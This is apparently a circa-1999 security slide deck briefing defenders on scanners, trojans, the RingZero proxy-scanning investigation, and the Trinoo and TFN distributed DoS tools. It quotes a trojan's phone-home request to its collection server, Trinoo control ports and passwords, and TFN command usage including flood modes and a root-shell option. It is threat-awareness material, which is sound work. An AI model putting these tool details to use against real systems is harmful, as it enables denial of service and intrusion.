440 likes | 459 Views
Internet Threat Brief. Bad things that happen to good organizations!. Tools that may be visiting your organization. Jackal Queso Nmap Hping Trojans DDOS. Enter the Jackal 1997.
E N D
Internet Threat Brief Bad things that happen to good organizations!
Tools that may be visiting your organization • Jackal • Queso • Nmap • Hping • Trojans • DDOS
Enter the Jackal 1997 /* Jackal - Stealth/FireWall scanner. With the use of half open ports and sending SYNC (sometimes additional flags like FIN) one can scan behind a firewall. It shouldn’t let the site feel we're scanning by not doing a 3-way-handshake; we hope to avoid any tcp-logging. Credits: Halflife, Jeff (Phiji) Fay, Abdullah Marafie. Alpha Tester: Walter Kopecky. Results: Some firewalls did allow SYN | FIN to pass through. No Site has been able to log the connections though.. during alpha testing.ShadowS shadows@kuwait.net Copyleft (hack it; i really don’t care). */ Opening comments - Jackal.c
Sons of Jackal continue to be seen Source Port 0 and 65535 12:36:54 prober.0 > relay.net.2049: SF 111:111(0) win 512 16:11:38 IMAPER.65535 > ns2.org.143: SF 111:111(0) win 512 13:10:33 newbe.org.0 > 192.168.2.3.13: SF 111:111(0) win 512 SF - SYN = Synchronize or Start; FIN = Finish or Stop
Queso and friendshttp://www.apostols.org/projectz/queso/ Queso sends packets with unexpected code bit combinations to determine the operating system of the remote computer. Currently, they claim to be able to distinguish over 100 OSes and OS states. Queso pattern is shown on notes page
Hping (Jan 98) Designed to port scan hosts indirectly, packets are “bounced off” the host the attacker is framing. Hping is interesting because they are able to both spoof and collect info on the target; this had not been accomplished before.
Nmap The next generation of the tools that came before it integrates all their capabilities in a single tool: • Stealth scanning • Stack analysis, TCP fingerprinting • Sequence number prediction • Decoy
Trojans This is Roland’s home computer, connected to an ISP
Trojans “Driving the Bus”, NETBUS
W97M.Marker.a • Word 97 Virus • HKEY_CURRENT_USER\Software\Microsoft\MS Setup(ACME)\User Info • What does it do? • FTP’s what appear to be “worm tracks”, a list of the previous systems it has infected • Could potentially be a valuable recon tool for developing chains of potential infection
PCs ship with fast modems as standard equipment INTERNET ISP Firewall The more restrictive a site’s firewall policy, the more likely the employees will use modems.
Trojans Review • The most well known trojan programs are Netbus and Back Orifice • Protective tools include: all major anti-virus tools, nuke nabber, NFR’ Back Officer Friendly, and AtGuard
The Next “Threat Wave” • The security community is doing a better job of securing networks. • Firewalls, IDSs, Encryption • Doesn’t it make sense that future threats will bypass these countermeasures from the inside?
An Example Deep Throat Trace 200.31.13.8 > 158.12.110.1.2140: udp 2 4500 001e e104 0000 7111 8795 ac14 0d08 coa8 6e01 ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c 200.31.13.8 > 158.12.110.2.2140: udp 2 4500 001e e204 0000 7111 8694 ac14 0d08 coa8 6e02 ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231
The Story of RingZero • Indications and Warnings • This is BIG! • What is it? • What are “they” up to? • Decoding RingZero
Getting A Clue • Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem • We both commented that probes to tcp port 3128 are not that common
Indications and Warnings • Sept 21, 1999 - NSWC SHADOW analyst Adena Bushrod reports activity • Army ARL, Mitre, and others are seeing “Proxy Scans” too! Example: 08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0) 08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0) 08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)
SANS Community Validation “ Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!” This is BIG!
Over 300 3128 MessagesIn Three Days 29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25; 30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25; 31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48; 32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25; 33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25; 34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48; 35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48; 36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25; 37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48; 38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48; 39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48; 40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25; Over 1000 Source Hosts!
What Could It Be? • Given: • More than 1000 live sources • Apparently random destinations • What Could It Be? • Spoofed • Worlds largest coordinated attack • Trojan software or “malware
Spoofed Attack? No! “I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter. “ Judy Novak - ARL
The First Hot Tip - Sept 23 “We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:” Anonymous get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=80
So What? “Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.” Anonymous
Game Over? “I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.” Ron Marcum, Vanderbilt
Birds Of A Feather • Extreme BoF! • Crowded room • High temperatures • Long hours 7 hours of fun! (7PM-2AM)
Russian Server? Or Not? • The rusftpsearch.net site • contained Russian language text • is a German based company • is hosted by virtualave.net in Seattle, WA • is administered by “Black Harmer” • Black Harmer uses mail.ru for free email • Some of Harmer’s code published on fido7.pvt.virii • The data seems to indicate a “Russian interest”
Latest News • SMTP to Finland • Upon the successful download of two its.dat files, its.exe attempts to connect to tcp port 25 (smtp) of rokol.ramk.fi • Spamming ICQ Users • Spoofs source as www.mircosoft.com • Spams XXXXX@pager.mirabilis.com
Review of Findings • ITS.EXE attempts to • retrieve its.dat from various servers • connect to tcp port 25 of rokol.ramk.fi • Spam random ICQ users with the message “Biggest Proxy List!” and the rusftpsearch URL • PST.EXE is the active scanner • doesn’t require the its.dat file to run • discovered proxies send their IPs to www.rusftpsearch.net
Questions Still Remain • Infection mechanism? • Thought to be an email attachment • What is the its.dat file for? • Targeting • Scan intensity dial • Attack configuration
Implications? “Quantum leap in distributed attack technology” • Viral infection rates • Configurable - its.dat • scanning -> attacking? • Automatic result consolidation • Hacker community notification
Threat Advisory Distributed IW Tools By John Green
Force Multiplication Hacker H1 HN Handler Victims A1 A A A A AN Agent T T Target
Trinoo Network • Distributed UDP Flood DoS Attack Tool • Client / Server Architecture • A trinoo network of 227 systems was used against an Internet2 site, causing a DoS which lasted for two days.
Trinoo Signatures Hacker TCP port 27665 Password “betaalmostdone” H1 UDP port 31335 *HELLO* UDP port 27444 Password “l44adsl” A1 A A AN UDP Random Ports T
Handler die - quit mtimer - dos mdie - mping mdos - info msize - nslookup killdead - usebackup bcast - help mstop Agent aaa start UDP DoS bbb DoS timelimit shi phone home png report in d1e shut down rsz N resize packet xyz Multiple DoS Trinoo Supported Commands
Tribal Flood Network • Distributed ICMP/TCP/UDP Flood DoS • Client / Server Architecture • Similar to Trinoo, but much more stealthy • uses covert channels for handler-agent communications
TFN Signatures Hacker Any backdoor access method H1 ICMP Echo Reply ICMP Echo Reply Commands are sent as 16 bit integers in the ID field of the IP header A1 A A AN TCP/UDP/ICMP Flood T
TFN Supported Commands • Usage: ./tfn <iplist> <type> [ip] [port] • <iplist> - list of agent hosts • <type> - -1 spoofmask, -2 packetsize 0 stop/status 1 udp, 2 syn, 3 icmp 4 bind to a rootshell 5 smurf • [ip] - targetlist separated by @ • [port] - necessary for syn flood, 0 = random
So what does it mean? • 1997 • Stealth, resist logging • Penetration, evade SYN matching • 1998 • TCP Fingerprinting - stack analysis • Coordinated attacks
So what does it mean? • 1999 • Database analysis capability • Continued work on distributed scanners • Decoys, decoys, decoys • Advanced scans for trojans
Houston, we have a problem • Technological surprise • Decoys are going to really screw with low end intrusion detection systems and untrained analysts • CIRTs are going to need raw data from detects
What am I doing • High end proxy firewalls • Checking log files, intrusion detection • Personal firewalls (TCP Wrappers, Nuke Nabber, NFR Officer Friendly, At Guard) • Encrypting more of my files, moving to 2048 bit encryption